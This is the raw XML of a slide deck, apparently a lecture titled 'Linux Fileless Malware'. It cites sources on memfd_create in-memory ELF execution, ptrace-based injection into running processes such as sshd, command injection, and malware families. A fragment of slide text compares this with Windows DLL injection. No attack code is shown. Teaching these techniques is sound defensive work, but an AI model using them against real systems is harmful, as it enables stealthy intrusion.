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7"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="324" r:id="rId3"/>
    <p:sldId id="323" r:id="rId4"/>
    <p:sldId id="312" r:id="rId5"/>
    <p:sldId id="313" r:id="rId6"/>
    <p:sldId id="314" r:id="rId7"/>
    <p:sldId id="315" r:id="rId8"/>
    <p:sldId id="352" r:id="rId9"/>
    <p:sldId id="353" r:id="rId10"/>
    <p:sldId id="354" r:id="rId11"/>
    <p:sldId id="357" r:id="rId12"/>
    <p:sldId id="391" r:id="rId13"/>
    <p:sldId id="358" r:id="rId14"/>
    <p:sldId id="359" r:id="rId15"/>
    <p:sldId id="360" r:id="rId16"/>
    <p:sldId id="364" r:id="rId17"/>
    <p:sldId id="365" r:id="rId18"/>
    <p:sldId id="366" r:id="rId19"/>
    <p:sldId id="367" r:id="rId20"/>
    <p:sldId id="373" r:id="rId21"/>
    <p:sldId id="374" r:id="rId22"/>
    <p:sldId id="376" r:id="rId23"/>
    <p:sldId id="377" r:id="rId24"/>
    <p:sldId id="378" r:id="rId25"/>
    <p:sldId id="379" r:id="rId26"/>
    <p:sldId id="375" r:id="rId27"/>
    <p:sldId id="395" r:id="rId28"/>
    <p:sldId id="407" r:id="rId29"/>
    <p:sldId id="400" r:id="rId30"/>
    <p:sldId id="401" r:id="rId31"/>
    <p:sldId id="396" r:id="rId32"/>
    <p:sldId id="397" r:id="rId33"/>
    <p:sldId id="398" r:id="rId34"/>
    <p:sldId id="402" r:id="rId35"/>
    <p:sldId id="399" r:id="rId36"/>
    <p:sldId id="406" r:id="rId37"/>
    <p:sldId id="408" r:id="rId38"/>
    <p:sldId id="409" r:id="rId39"/>
    <p:sldId id="405" r:id="rId40"/>
    <p:sldId id="403" r:id="rId41"/>
    <p:sldId id="404" r:id="rId42"/>
    <p:sldId id="332" r:id="rId43"/>
    <p:sldId id="260" r:id="rId44"/>
    <p:sldId id="326" r:id="rId45"/>
    <p:sldId id="270" r:id="rId46"/>
    <p:sldId id="271" r:id="rId47"/>
    <p:sldId id="272" r:id="rId48"/>
    <p:sldId id="277" r:id="rId49"/>
    <p:sldId id="276" r:id="rId50"/>
    <p:sldId id="280" r:id="rId51"/>
    <p:sldId id="273" r:id="rId52"/>
    <p:sldId id="278" r:id="rId53"/>
    <p:sldId id="261" r:id="rId54"/>
    <p:sldId id="274" r:id="rId55"/>
    <p:sldId id="299" r:id="rId56"/>
    <p:sldId id="300" r:id="rId57"/>
    <p:sldId id="301" r:id="rId58"/>
    <p:sldId id="434" r:id="rId59"/>
    <p:sldId id="435" r:id="rId60"/>
    <p:sldId id="436" r:id="rId61"/>
    <p:sldId id="302" r:id="rId62"/>
    <p:sldId id="303" r:id="rId63"/>
    <p:sldId id="304" r:id="rId64"/>
    <p:sldId id="325" r:id="rId65"/>
    <p:sldId id="372" r:id="rId66"/>
    <p:sldId id="427" r:id="rId67"/>
    <p:sldId id="428" r:id="rId68"/>
    <p:sldId id="429" r:id="rId69"/>
    <p:sldId id="430" r:id="rId70"/>
    <p:sldId id="417" r:id="rId71"/>
    <p:sldId id="418" r:id="rId72"/>
    <p:sldId id="419" r:id="rId73"/>
    <p:sldId id="420" r:id="rId74"/>
    <p:sldId id="421" r:id="rId75"/>
    <p:sldId id="422" r:id="rId76"/>
    <p:sldId id="423" r:id="rId77"/>
    <p:sldId id="424" r:id="rId78"/>
    <p:sldId id="425" r:id="rId79"/>
    <p:sldId id="426" r:id="rId80"/>
    <p:sldId id="410" r:id="rId81"/>
    <p:sldId id="411" r:id="rId82"/>
    <p:sldId id="392" r:id="rId83"/>
    <p:sldId id="393" r:id="rId84"/>
    <p:sldId id="394" r:id="rId85"/>
    <p:sldId id="355" r:id="rId86"/>
    <p:sldId id="371" r:id="rId87"/>
    <p:sldId id="416" r:id="rId88"/>
    <p:sldId id="384" r:id="rId89"/>
    <p:sldId id="385" r:id="rId90"/>
    <p:sldId id="386" r:id="rId91"/>
    <p:sldId id="287" r:id="rId92"/>
    <p:sldId id="322" r:id="rId93"/>
    <p:sldId id="321" r:id="rId94"/>
    <p:sldId id="333" r:id="rId95"/>
    <p:sldId id="437" r:id="rId96"/>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8110"/>
    <a:srgbClr val="1A7441"/>
    <a:srgbClr val="66FF66"/>
    <a:srgbClr val="E79FFB"/>
    <a:srgbClr val="CE3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62" autoAdjust="0"/>
    <p:restoredTop sz="94118" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="68" d="100"/>
          <a:sy n="68" d="100"/>
        </p:scale>
        <p:origin x="1440" y="5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041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BB57FA-2F12-4217-9B5A-220D23BF5427}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2024/11/3</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1168E3-BEF3-49C9-8766-6B487C31001C}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3625573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9F26B9BD-4362-4286-B3B0-52E8A67F0FFA}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2024/11/3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D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>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D8EE2FBA-F984-4270-BB3B-1A04B87175C6}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2024/11/3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D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>按一下以編輯母片標題樣式</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42A31EBD-797B-4D7D-8705-7C8B38DAD948}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2024/11/3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D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US"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5" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9BCDDCDC-17A1-415D-B1E4-381A9E104C7A}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2024/11/3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4D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676655" y="2679192"/>
            <a:ext cx="3822192" cy="34472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AE7B1AE5-9A27-4D80-8C98-BD1086B0F93D}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2024/11/3</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4D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5DB1AF26-ED92-4295-867E-A962FCC11C53}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2024/11/3</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4D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}"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F78A557-EEDD-4B56-A08E-A0A79DE2297F}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2024/11/3</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4D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}"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3A95A5C-FDAB-49DE-ABC4-EF4B5E792705}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2024/11/3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4D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" alt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6CAA4A08-40E8-43D3-B34E-E4B36E844149}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2024/11/3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4D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" alt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78A2B153-9C3E-4DB6-B371-DD46BFEEEE01}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2024/11/3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D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}"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965933D-BF7C-4FC0-97FF-A8B13A94B1B1}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2024/11/3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D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" alt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E3306420-44AC-441E-A54B-AB529CF2D9F3}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2024/11/3</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" alt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zh-TW" alt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4D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" alt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hackmd.io/@Drag0nR3b0rn/Byy8nh3r8"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owasp.org/www-community/attacks/Command_Injectio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wasp.org/www-community/attacks/Command_Injection" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/www-community/attacks/Code_Injectio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owasp.org/www-community/attacks/Command_Injection"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owasp.org/www-community/attacks/Command_Injecti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man7.org/linux/man-pages/man2/memfd_create.2.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man7.org/linux/man-pages/man2/memfd_create.2.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man7.org/linux/man-pages/man2/memfd_create.2.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magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.itread01.com/content/1530439100.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dvdhrm.wordpress.com/2014/06/10/memfd_create2/"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dvdhrm.wordpress.com/2014/06/10/memfd_create2/"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dvdhrm.wordpress.com/2014/06/10/memfd_create2/"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itw01.com/IKJHEIJ.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.freebsd.org/cgi/man.cgi?query=fexecve&amp;sektion=2&amp;n=1"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hyperlink" Target="https://itw01.com/IKJHEIJ.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linuxhandbook.com/nc-command/"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itw01.com/IKJHEIJ.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blog.fbkcs.ru/elf-in-memory-execution/"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blog.fbkcs.ru/elf-in-memory-execution/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ind.ntou.edu.tw/~dada/cgi/Perlsynx.ht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blog.fbkcs.ru/elf-in-memory-execution/"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blog.techbridge.cc/2019/02/01/linux-curl-command-tutoria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linux.die.net/man/3/malloc" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://man7.org/linux/man-pages/man2/memfd_create.2.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.fbkcs.ru/elf-in-memory-execution/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://man7.org/linux/man-pages/man2/execve.2.html"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itw01.com/VJ49AEH.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.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itw01.com/VJ49AEH.html"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itread01.com/content/1547948189.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://perldoc.perl.org/functions/syscall" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html"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perl.plover.com/FAQs/Buffering.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://perldoc.perl.org/functions/open" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://n.sfs.tw/content/index/12996" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://topic.alibabacloud.com/tc/a/the-role-of-perl-variables-i-our-local-and-global-variables-_perl_1_40_20291494.html"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itw01.com/VJ49AEH.html"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magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html"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stackoverflow.com/questions/35998268/how-to-break-a-huge-text-file-into-different-lines-every-32-characters-in-one-l" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.perl.com/pub/2004/08/09/commandline.html/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://perlmaven.com/the-diamond-operator" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.perltutorial.org/perl-while/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://alvinalexander.com/perl/edu/articles/pl010003.shtml"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perlmaven.com/the-diamond-operator" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://perlmaven.com/argv-in-perl"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perlmaven.com/undef-and-defined-in-perl" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://perlmaven.com/manipulating-perl-arrays" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://perlmaven.com/the-diamond-operator"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itw01.com/VJ49AEH.html"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itw01.com/VJ49AEH.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://perldoc.perl.org/functions/exec" TargetMode="Externa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ithelp.ithome.com.tw/articles/10186715"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blog.xpnsec.com/linux-process-injection-aka-injecting-into-sshd-for-fun/"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man7.org/linux/man-pages/man2/ptrace.2.html"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man7.org/linux/man-pages/man2/ptrace.2.html"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man7.org/linux/man-pages/man2/ptrace.2.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man2/clone.2.html"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man7.org/linux/man-pages/man2/execve.2.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man2/fork.2.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man2/ptrace.2.html"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man7.org/linux/man-pages/man2/ptrace.2.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.xpnsec.com/linux-process-injection-aka-injecting-into-sshd-for-fun/"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man7.org/linux/man-pages/man2/ptrace.2.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man2/waitpid.2.html"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s://man7.org/linux/man-pages/man2/ptrace.2.html"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s://man7.org/linux/man-pages/man2/ptrace.2.html"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www.ibm.com/docs/en/zos/2.1.0?topic=functions-waitpid-wait-specific-child-process-end"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www.gnu.org/software/libc/manual/html_node/Process-Completion-Status.html"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nullprogram.com/blog/2016/09/03/"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nullprogram.com/blog/2016/09/03/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.cloudflare.com/diving-into-proc-pid-mem/"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nullprogram.com/blog/2016/09/03/"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blog.xpnsec.com/linux-process-injection-aka-injecting-into-sshd-for-fun/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man5/proc.5.html"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blog.xpnsec.com/linux-process-injection-aka-injecting-into-sshd-for-fun/"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s://blog.xpnsec.com/linux-process-injection-aka-injecting-into-sshd-for-fun/"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s://nullprogram.com/blog/2016/09/03/"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man7.org/linux/man-pages/man2/process_vm_readv.2.html"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http://man7.org/linux/man-pages/man2/process_vm_writev.2.html"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s://stackoverflow.com/questions/66417664/why-does-gdb-allow-writes-to-non-writable-addresses?noredirect=1&amp;lq=1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man2/ptrace.2.html"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s://azure.microsoft.com/zh-tw/blog/fileless-attack-detection-for-linux-in-preview/"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www.cybersecurity-help.cz/vdb/SB2018112204" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.alertlogic.com/hc/en-us/articles/360018778412-Metasploit-Hadoop-YARN-ResourceManager-Unauthenticated-Command-Execution" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://azure.microsoft.com/zh-tw/blog/fileless-attack-detection-for-linux-in-preview/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netscout.com/blog/asert/mirai-not-just-iot-anymore" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.radware.com/security/2018/10/new-demonbot-discovered/" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide68.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://azure.microsoft.com/zh-tw/blog/fileless-attack-detection-for-linux-in-preview/"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hyperlink" Target="https://azure.microsoft.com/zh-tw/blog/fileless-attack-detection-for-linux-in-preview/"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s://man7.org/linux/man-pages/man2/mmap.2.html"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linuxhint.com/using_mmap_function_linux/"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clear.rice.edu/comp321/html/laboratories/lab10/"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hyperlink" Target="https://man7.org/linux/man-pages/man2/mmap.2.html"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s://man7.org/linux/man-pages/man2/mmap.2.html"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hyperlink" Target="https://man7.org/linux/man-pages/man2/mmap.2.html"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hyperlink" Target="https://man7.org/linux/man-pages/man2/mmap.2.html"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hyperlink" Target="https://man7.org/linux/man-pages/man2/mmap.2.html"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s://man7.org/linux/man-pages/man2/mmap.2.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man3/errno.3.html"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hyperlink" Target="https://www.cynet.com/attack-techniques-hands-on/what-are-lolbins-and-how-do-attackers-use-them-in-fileless-attacks/"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s://www.bleepingcomputer.com/news/security/linux-malware-authors-use-ezuri-golang-crypter-for-zero-detection/"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hyperlink" Target="https://www.itread01.com/content/1530439100.html" TargetMode="Externa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man7.org/linux/man-pages/man2/memfd_create.2.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://man7.org/linux/man-pages/man2/mmap.2.html"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hyperlink" Target="https://www.kernel.org/doc/html/latest/admin-guide/mm/concepts.html"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hyperlink" Target="https://dvdhrm.wordpress.com/2014/06/10/memfd_create2/"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linux.die.net/include/sys/types.h" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/include/unistd.h" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/2/ftruncate" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide89.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/2/ftruncate"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hyperlink" Target="https://linux.die.net/man/2/ftruncate"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magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linuxsecurity.com/features/fileless-malware-on-linux" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://itw01.com/VJ49AEH.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cybersecurity.att.com/blogs/labs-research/malware-using-new-ezuri-memory-loader" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.xpnsec.com/linux-process-injection-aka-injecting-into-sshd-for-fun/"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askubuntu.com/questions/169495/what-are-run-lock-and-run-shm-used-for" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unix.stackexchange.com/questions/372551/how-does-fileless-malware-work-on-linux" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cynet.com/attack-techniques-hands-on/what-are-lolbins-and-how-do-attackers-use-them-in-fileless-attacks/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackmd.io/@sysprog/linux-shared-memory" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://x-c3ll.github.io/posts/fileless-memfd_create/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sandflysecurity.com/blog/detecting-linux-memfd_create-fileless-malware-with-command-line-forensics/"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s://www.globenewswire.com/en/news-release/2021/03/30/2201173/0/en/New-Research-Fileless-Malware-Attacks-Surge-by-900-and-Cryptominers-Make-a-Comeback-While-Ransomware-Attacks-Decline.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.plesk.com/blog/security-alerts/fileless-attacks-rising/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.spoock.com/2019/08/27/elf-in-memory-execution/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://itw01.com/IKJHEIJ.html"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s://blog.xpnsec.com/linux-process-injection-aka-injecting-into-sshd-for-fun/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://unix.stackexchange.com/questions/6301/how-do-i-read-from-proc-pid-mem-under-linu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a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Malware</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="副標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"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1</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3038331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876397" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>If you’re familiar with Windows runtime code injection you probably know the great API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CreateRemoteThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> which lets us force an arbitrary running process to call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LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and load a DLL into its address space, this technique called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
